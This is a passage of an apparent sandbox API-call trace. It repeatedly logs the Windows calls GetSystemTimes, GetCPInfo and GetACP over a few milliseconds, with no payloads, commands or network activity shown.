lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.935] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.935] GetACP () returned 0x4e4 [0128.935] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.935] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.935] GetACP () returned 0x4e4 [0128.935] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.935] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.935] GetACP () returned 0x4e4 [0128.935] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.935] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.936] GetACP () returned 0x4e4 [0128.936] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.936] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.936] GetACP () returned 0x4e4 [0128.936] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.936] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.936] GetACP () returned 0x4e4 [0128.936] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.936] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.936] GetACP () returned 0x4e4 [0128.936] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.936] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.936] GetACP () returned 0x4e4 [0128.936] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.937] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.937] GetACP () returned 0x4e4 [0128.937] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.937] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.937] GetACP () returned 0x4e4 [0128.937] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.937] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.937] GetACP () returned 0x4e4 [0128.937] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.937] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.937] GetACP () returned 0x4e4 [0128.937] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.937] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.937] GetACP () returned 0x4e4 [0128.937] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.937] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.937] GetACP () returned 0x4e4 [0128.937] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.937] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.937] GetACP () returned 0x4e4 [0128.938] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.938] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.938] GetACP () returned 0x4e4 [0128.938] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.938] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.938] GetACP () returned 0x4e4 [0128.938] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.938] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.938] GetACP () returned 0x4e4 [0128.938] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.938] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.938] GetACP () returned 0x4e4 [0128.938] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.938] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.938] GetACP () returned 0x4e4 [0128.938] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.938] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.938] GetACP () returned 0x4e4 [0128.939] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.939] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.939] GetACP () returned 0x4e4 [0128.939] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.939] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.939] GetACP () returned 0x4e4 [0128.939] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.939] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.939] GetACP () returned 0x4e4 [0128.939] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.939] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.939] GetACP () returned 0x4e4 [0128.939] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.939] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.939] GetACP () returned 0x4e4 [0128.939] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.939] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.939] GetACP () returned 0x4e4 [0128.939] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.940] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.940] GetACP () returned 0x4e4 [0128.940] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.940] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.940] GetACP () returned 0x4e4 [0128.940] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.940] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.940] GetACP () returned 0x4e4 [0128.940] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.940] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.940] GetACP () returned 0x4e4 [0128.940] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.940] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.940] GetACP () returned 0x4e4 [0128.940] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.940] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.940] GetACP () returned 0x4e4 [0128.940] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.941] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.941] GetACP () returned 0x4e4 [0128.941] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.941] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.941] GetACP () returned 0x4e4 [0128.941] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.941] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.941] GetACP () returned 0x4e4 [0128.941] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.941] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.941] GetACP () returned 0x4e4 [0128.941] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.941] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.941] GetACP () returned 0x4e4 [0128.941] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.941] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.941] GetACP () returned 0x4e4 [0128.941] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.942] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.942] GetACP () returned 0x4e4 [0128.942] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.942] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.942] GetACP () returned 0x4e4 [0128.942] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.942] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.942] GetACP () returned 0x4e4 [0128.942] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.942] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.942] GetACP () returned 0x4e4 [0128.942] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.942] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.942] GetACP () returned 0x4e4 [0128.942] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.942] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.942] GetACP () returned 0x4e4 [0128.942] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.943] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.943] GetACP () returned 0x4e4 [0128.943] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.943] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.943] GetACP () returned 0x4e4 [0128.943] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.943] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.943] GetACP () returned 0x4e4 [0128.943] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.943] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.943] GetACP () returned 0x4e4 [0128.943] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.943] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.943] GetACP () returned 0x4e4 [0128.943] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.944] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.944] GetACP () returned 0x4e4 [0128.944] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.944] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.944] GetACP () returned 0x4e4 [0128.944] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.944] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.944] GetACP () returned 0x4e4 [0128.944] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.944] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.944] GetACP () returned 0x4e4 [0128.944] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.944] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.944] GetACP () returned 0x4e4 [0128.944] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.945] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.945] GetACP () returned 0x4e4 [0128.945] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.945] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.945] GetACP () returned 0x4e4 [0128.945] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.945] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.945] GetACP () returned 0x4e4 [0128.945] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.945] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.945] GetACP () returned 0x4e4 [0128.945] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.945] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.946] GetACP () returned 0x4e4 [0128.946] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.946] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.946] GetACP () returned 0x4e4 [0128.947] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.947] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.947] GetACP () returned 0x4e4 [0128.947] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.947] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.947] GetACP () returned 0x4e4 [0128.947] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.947] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.947] GetACP () returned 0x4e4 [0128.947] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.947] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.947] GetACP () returned 0x4e4 [0128.947] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.948] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.948] GetACP () returned 0x4e4 [0128.948] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.948] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.948] GetACP () returned 0x4e4 [0128.948] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.948] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.948] GetACP () returned 0x4e4 [0128.948] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.948] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.948] GetACP () returned 0x4e4 [0128.948] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.948] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.948] GetACP () returned 0x4e4 [0128.948] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.948] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.948] GetACP () returned 0x4e4 [0128.949] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.949] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.949] GetACP () returned 0x4e4 [0128.949] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.949] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.949] GetACP () returned 0x4e4 [0128.949] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.949] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.949] GetACP () returned 0x4e4 [0128.949] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.949] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.949] GetACP () returned 0x4e4 [0128.949] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.949] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.949] GetACP () returned 0x4e4 [0128.949] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.950] GetCPInfo (in: CodePage=0x0, 